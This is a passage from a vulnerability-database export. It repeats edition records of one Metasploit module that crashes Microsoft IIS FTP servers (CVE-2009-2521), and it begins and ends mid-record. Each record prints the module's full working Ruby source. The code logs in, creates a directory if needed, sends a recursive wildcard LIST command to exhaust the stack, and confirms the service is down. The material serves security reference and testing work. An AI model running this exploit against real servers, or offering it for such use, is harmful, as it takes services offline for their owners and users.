3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-07T22:03:27", "history": [], "viewCount": 36, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-07T22:03:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-07T22:03:27", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-08T06:11:28", "history": [], "viewCount": 36, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-08T06:11:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-08T06:11:28", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-24T20:07:52", "history": [], "viewCount": 36, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-24T20:07:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-24T20:07:52", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-24T22:06:29", "history": [], "viewCount": 36, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-24T22:06:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-24T22:06:29", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-31T04:10:28", "history": [], "viewCount": 36, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-31T04:10:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-31T04:10:28", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-31T06:08:21", "history": [], "viewCount": 38, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-31T06:08:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-31T06:08:21", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-02-06T04:23:27", "history": [], "viewCount": 38, "enchantments": {"score": {"value": 2.6, "modified": "2018-02-06T04:23:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 